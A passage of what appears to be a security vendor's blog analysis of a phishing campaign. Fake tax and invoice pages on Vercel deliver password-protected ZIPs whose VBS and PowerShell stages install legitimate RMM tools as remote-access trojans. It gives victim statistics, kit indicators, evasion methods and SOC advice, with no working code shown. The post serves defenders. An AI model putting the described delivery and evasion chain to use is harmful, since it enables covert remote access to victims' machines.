<p class="wp-block-paragraph"><strong>Campaign Profile</strong> </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-360"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="9"
           data-wpID="360"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Attribute                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Assessment                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Threat type                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Phishing delivering RMM-as-RAT for living-off-the-land remote access                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Family                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Fake-document-to-RMM kit; the CRA/T4 Word lure is one arm of a broader fmtt font-linked family                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Severity                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        High — hands-on-keyboard remote access                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Sophistication                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Capable — kit-based delivery, LOLBin RMM abuse, password-protected archive, Telegram-based victim filtering; built entirely on legitimate signed tooling                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Payload                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Signed RMM installers abused as remote-access trojans; productsare interchangeable and include GoTo Resolve, LogMeIn Rescue, ITarian in this arm; ScreenConnect, ConnectWise in sibling arms                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Impersonated brands                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Canada Revenue Agency / 2025 T4 Form, SSA, VAT/ATO, DocuSign, Adobe PDF, overdue invoices, shipping documents                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Attribution                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Campaign-level based on shareddelivery-kit handwriting; no named threat actor. Whether this is one operator or a shared phishing-as-a-service kit remains unknown                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Activity window                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        January 2026 to present; steady 17–33 kit cases per month                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-360'>
table#wpdtSimpleTable-360{ table-layout: fixed !important; }
table#wpdtSimpleTable-360 td, table.wpdtSimpleTable360 th { white-space: normal !important; }
</style>




<h3 class="wp-block-heading">Statistics and Victimology </h3>



<p class="wp-block-paragraph">Two scopes are important here: the CRA/T4 Word arm, with 137 observed cases, and the broader fake-document family, covering 425 kit URLs across 240 hosts and 601 cases with geographic and industry context. </p>



<p class="wp-block-paragraph">Activity grew from a single observed case in January 2026 to a steady 17–33 cases per month. Because the final payload is legitimate signed RMM software, cases are tracked through shared kit assets rather than malware-family verdicts, which would significantly undercount the campaign. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="2400" height="1994" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Kit-Cases-Per-Month.png" alt="" class="wp-image-22847" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Kit-Cases-Per-Month.png 2400w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Kit-Cases-Per-Month-300x249.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Kit-Cases-Per-Month-1024x851.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Kit-Cases-Per-Month-768x638.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Kit-Cases-Per-Month-1536x1276.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Kit-Cases-Per-Month-2048x1702.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Kit-Cases-Per-Month-370x307.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Kit-Cases-Per-Month-270x224.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Kit-Cases-Per-Month-740x615.png 740w" sizes="auto, (max-width: 2400px) 100vw, 2400px" /><figcaption class="wp-element-caption">Kit cases per month graph by ANY.RUN</figcaption></figure>



<p class="wp-block-paragraph">Geographically, the broader family is US-first, while the CRA/T4 arm is Canada-first. North America accounts for 61% of family cases, but activity spans 46 countries, with 35 contributing 1% or less. Canada represents 16% of the broader family but 33.3% of the CRA/T4 arm, consistent with deliberate targeting around the Canadian tax lure. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="2400" height="1848" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Submissions-by-Country-1.png" alt="" class="wp-image-23063" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Submissions-by-Country-1.png 2400w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Submissions-by-Country-1-300x231.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Submissions-by-Country-1-1024x788.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Submissions-by-Country-1-768x591.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Submissions-by-Country-1-1536x1183.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Submissions-by-Country-1-2048x1577.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Submissions-by-Country-1-370x285.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Submissions-by-Country-1-270x208.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Submissions-by-Country-1-740x570.png 740w" sizes="auto, (max-width: 2400px) 100vw, 2400px" /><figcaption class="wp-element-caption">Family submitter geography by ANY.RUN</figcaption></figure>



<p class="wp-block-paragraph">Across industries, education, <a href="https://any.run/by-industry/technology/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktotechnology" target="_blank" rel="noreferrer noopener">technology</a>, and <a href="https://any.run/by-industry/government/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktogovernment" target="_blank" rel="noreferrer noopener">government</a> appear prominently in both datasets. Technology figures may be influenced by higher security-team submission rates, while the exposure seen in education and government is more consistent with genuine targeting.</p>



<p class="wp-block-paragraph">Banking, <a href="https://any.run/by-industry/manufacturing/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktomanufacturing" target="_blank" rel="noreferrer noopener">manufacturing</a>, and <a href="https://any.run/by-industry/finance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktofinance" target="_blank" rel="noreferrer noopener">finance</a> also feature prominently, aligning more closely with the campaign’s invoice and VAT-themed lures. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="902" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Risk-Score-by-Industry-902x1024.png" alt="" class="wp-image-22850" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Risk-Score-by-Industry-902x1024.png 902w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Risk-Score-by-Industry-264x300.png 264w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Risk-Score-by-Industry-768x872.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Risk-Score-by-Industry-1353x1536.png 1353w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Risk-Score-by-Industry-1804x2048.png 1804w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Risk-Score-by-Industry-370x420.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Risk-Score-by-Industry-270x306.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Risk-Score-by-Industry-740x840.png 740w" sizes="auto, (max-width: 902px) 100vw, 902px" /><figcaption class="wp-element-caption"> Industry risk score, %, overview by ANY.RUN</figcaption></figure>



<p class="wp-block-paragraph">These figures represent where campaign samples were observed rather than confirmed compromises, so they should be treated as indicators of targeting focus and a proxy for the potential victim population. </p>



<h3 class="wp-block-heading">What to Take Back to Your SOC Team </h3>



<p class="wp-block-paragraph">For security leaders, the key takeaway is that defenses need to be product-agnostic. This campaign abuses legitimate, signed RMM software and can switch between vendors, so controls built around a specific tool or AV verdict will leave gaps. Ensure your SOC focuses on the delivery chain and unauthorized remote-access activity instead. </p>



<ul class="wp-block-list">
<li><strong>Treat the RMM install itself as a signal, whatever the product.</strong> GoTo Resolve, LogMeIn Rescue, ScreenConnect, ConnectWise, and ITarian have all been abused in this campaign. <a href="https://any.run/cybersecurity-blog/threat-monitoring-ti-feeds/" target="_blank" rel="noreferrer noopener">Detection</a> should focus on how the software reaches the environment, particularly installations originating from new free-hosting domains or compromised WordPress pages, rather than on the RMMproduct itself. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Build detection around persistent campaign patterns. </strong>Disposable Vercel infrastructure rotates rapidly: 94% of 240 observed hosts appeared for only a single day. Instead of relying primarily on domains, prioritize stable kit indicators, including the fmtt / font1.woff2, icons8-microsoft-word-94.png asset, and the secure.html → project/*.zip chain. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Account for password-protected archive delivery.</strong> The campaign pairs fake document pages with password-protected ZIP files and provides the password to the victim, helping payloads evade automated inspection. Mail-layer controls and user awareness should account for this delivery pattern. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Baseline authorized remote-access tooling.</strong> Maintain an inventory of approved RMM products and ensure the SOC can quickly identify unexpected installations or activity. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Give analysts behavioral and threat context in one investigation workflow.</strong> In this analysis, <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a> exposed the delivery chain, browser activity, scripts, and network requests, while <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> expanded persistent indicators into the wider campaign. </li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Move from detection to campaign-level context 
<br>
for <span class="highlight">14-sec MTTD</span> and <span class="highlight">21-min shorter MTTR</span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=us-campaign-malware-analysi&#038;utm_term=250826&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Explore ANY.RUN for Your Team</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Part II. Technical Malware Analysis </h2>



<h3 class="wp-block-heading">Introduction </h3>



<p class="wp-block-paragraph">New *.vercel[.]app deployments appear more or less constantly, each only days old. </p>



<p class="wp-block-paragraph">One of them, fillingconfirmation[.]vercel[.]app, had been registered just one day before it was observed. Vercel suits the operator well: every deployment comes with valid TLS, a trusted domain, and one-command redeployment. All this gives the lures the reputation needed to clear mail filters while remaining cheap enough to abandon at will. </p>



<p class="wp-block-paragraph">The activity has continued since January 2026 at a steady monthly pace, with 18 to 57 new kit hosts appearing each month. Cloudflare, Kaseya/INKY, and CyberArmor have also reported on this activity, with findings consistent with what follows here. </p>



<h3 class="wp-block-heading">The delivery chain </h3>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId15-1024x578.png" alt="" class="wp-image-22851" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId15-1024x578.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId15-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId15-768x434.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId15-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId15-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId15-740x418.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId15.png 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">The phishing email example. ANY.RUN</figcaption></figure>



<p class="wp-block-paragraph">The attack begins with a phishing email linking to a disposable *.vercel[.]app page disguised as a legitimate document. The CRA/T4 lure is one example, alongside SSA, VAT, invoice, shipping, and other document-themed variants. </p>



<p class="wp-block-paragraph">The page redirects to secure.html, which provides an access code and downloads a password-protected ZIP – the payload. Once the victim extracts and runs the VBS script inside, PowerShell downloads and installs a legitimate RMM agent, giving the operator hands-on-keyboard remote access. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="957" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Attack-Chain-Overview-1024x957.png" alt="" class="wp-image-22852" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Attack-Chain-Overview-1024x957.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Attack-Chain-Overview-300x281.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Attack-Chain-Overview-768x718.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Attack-Chain-Overview-1536x1436.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Attack-Chain-Overview-2048x1915.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Attack-Chain-Overview-370x346.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Attack-Chain-Overview-270x252.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Attack-Chain-Overview-740x692.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">The delivery chain scheme by ANY.RUN</figcaption></figure>



<h3 class="wp-block-heading">The Kit’s Handwriting Revealed via Advanced URL Analysis </h3>



<p class="wp-block-paragraph">Using ANY.RUN’s <a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/" target="_blank" rel="noreferrer noopener">in-browser data inspection</a>, we reconstructed the full browser-side chain, including DOM changes, redirects, page content, and screenshots of what the victim sees at each stage. </p>



<p class="wp-block-paragraph">Every deployment ships essentially the same page, byte for byte. Several recurring DOM elements reveal the kit’s distinctive handwriting: </p>



<ul class="wp-block-list">
<li>An empty title. </li>
</ul>



<ul class="wp-block-list">
<li>A @font-face declaration for font-family:&#8217;fmtt&#8217; sourcing url(img/font1.woff2) — the shared font that links the broader family. </li>
</ul>



<ul class="wp-block-list">
<li>img src=&#8217;img/icons8-microsoft-word-94.png&#8217; id=&#8217;fd&#8217; alt=&#8217;PDF Icon&#8217; — a Word icon persistently mislabeled as “PDF Icon.” </li>
</ul>



<ul class="wp-block-list">
<li>A #rl red spinner element. </li>
</ul>



<ul class="wp-block-list">
<li>A three-hop meta-refresh chain: root page → secure.html → project/&lt;lure&gt;.zip. </li>
</ul>



<ul class="wp-block-list">
<li>The recurring “Downloading 2025 T4 Form…” and access-code text. </li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="558" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId22-1-1024x558.png" alt="" class="wp-image-22854" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId22-1-1024x558.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId22-1-300x164.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId22-1-768x419.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId22-1-1536x838.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId22-1-370x202.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId22-1-270x147.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId22-1-740x403.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId22-1.png 1955w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">The Adobe phishing page, as seen in ANY.RUN Sandbox Browser Data tab</figcaption></figure>



<p class="wp-block-paragraph">For additional cover, the kit opens a harmless decoy PDF through legitimate OneDrive infrastructure (1drv[.]ms, onedrive[.]live[.]com, and canadaeast1-mediap[.]svc[.]ms). Its purpose is simply to make the download appear routine to the victim. </p>



<h3 class="wp-block-heading">Execution behavior </h3>



<p class="wp-block-paragraph">Using <a href="https://any.run/cybersecurity-blog/static-discovery-update/" target="_blank" rel="noreferrer noopener">Static discovering</a> in <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a>, we inspected the VBS script responsible for launching the next stage of the attack. </p>



<p class="wp-block-paragraph">The chain progresses only after the victim enters the on-page access code. This unlocks a single VBS script that uses FileSystemObject to launch POWERSHELL.EXE and download the next stage. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
See the <span class="highlight">full attack chain</span>  behind suspicious URLs 
<br>
Gain in-depth visibility for a <span class="highlight">36% higher DR</span> 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://login.any.run/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=us-campaign-malware-analysi&#038;utm_term=250826&#038;utm_content=linktoregister" rel="noopener" target="_blank">
Register with ANY.RUN</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">PowerShell does the rest: it skips the user profile, introduces a sleep delay to evade timing-based analysis, writes binary data to a stream, and downloads and installs the RMM MSI. Once installed, the RMM agent gives the operator live, hands-on-keyboard access to the system. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="621" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId26-1024x621.png" alt="" class="wp-image-22855" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId26-1024x621.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId26-300x182.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId26-768x466.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId26-370x224.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId26-270x164.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId26-740x449.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId26.png 1307w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">The fragment of VBS script. ANY.RUN Sandbox </figcaption></figure>



<h3 class="wp-block-heading">Evasion </h3>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="664" height="739" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId30.png" alt="" class="wp-image-22856" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId30.png 664w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId30-270x300.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/rId30-370x412.png 370w" sizes="auto, (max-width: 664px) 100vw, 664px" /><figcaption class="wp-element-caption">The example of HTTP request to download password protected archive. ANY.RUN Sandbox</figcaption></figure>
</div>


<p class="wp-block-paragraph">Evasion operates across multiple stages of the delivery chain. The first layer is the archive: project/&lt;lure&gt;.zip returns HTTP 200 but remains password-encrypted, leaving automated pipelines with an inert ZIP they cannot open. The VBS inside is extracted and executed only after the victim enters the on-page access code. </p>



<p class="wp-block-paragraph">The second layer sits in front of payload delivery. The page fingerprints the browser, IP address, and geolocation using FingerprintJS, an hCaptcha challenge, and a “Green Spinner” gate. On some pages, the results are relayed to api.telegram[.]org, allowing the payload to be served only to visitors that pass the checks while filtering out suspected analysis environments. </p>



<p class="wp-block-paragraph">The PowerShell stage adds timing-based evasion by calling sleep before reaching out for the MSI installer. </p>



<p class="wp-block-paragraph">HTTP request analysis in <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a> made these delivery and evasion flows visible. </p>



<p class="wp-block-paragraph">Following the network trail revealed a broader, highly distributed infrastructure. </p>



<h3 class="wp-block-heading">Network Infrastructure </h3>



<ul class="wp-block-list">
<li><strong>Delivery infrastructure: </strong>The family includes 82 code-identical Vercel apps, each observed for only a single day, alongside GitHub Pages, Netlify, compromised legitimate websites, and throwaway domains. Vercel is particularly useful to the operator because each new deployment inherits valid TLS and domain reputation. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Payload staging:</strong> RMM installers are staged across rotating infrastructure, including Amazon S3, Cloudflare R2, GitHub, DigitalOcean Spaces, gofile[.]io, Dropbox, compromised sites, and raw-IP hosts. </li>
</ul>



<ul class="wp-block-list">
<li><strong>RMM infrastructure: </strong>The remote-access product is interchangeable. At least five legitimate RMM products have appeared across the family, while the delivery chain remains largely unchanged. </li>
</ul>



<p class="wp-block-paragraph">The evidence behind each product is uneven, which bounds what any per-product signature can cover: </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-361"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="6"
           data-wpID="361"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        RMM product                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        What backs it                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Install / network artifacts measured                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        LogMeIn Rescue / Resolve                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        46 cases in this arm; captured MSILogMeInResolve_Unattended.msi                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Yes — LOGMEINRESCUEmutex on host                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        GoTo Resolve                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Dominant product by network telemetry inthis arm                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Yes — TLS SNI and DNS togotoresolve[.]com                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        ScreenConnect                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        204 family cases, outside this arm                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Identified by case tag                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        ConnectWise                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        106 family cases, outside this arm                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Identified by case tag                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        ITarian                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        1 case                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        No                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-361'>
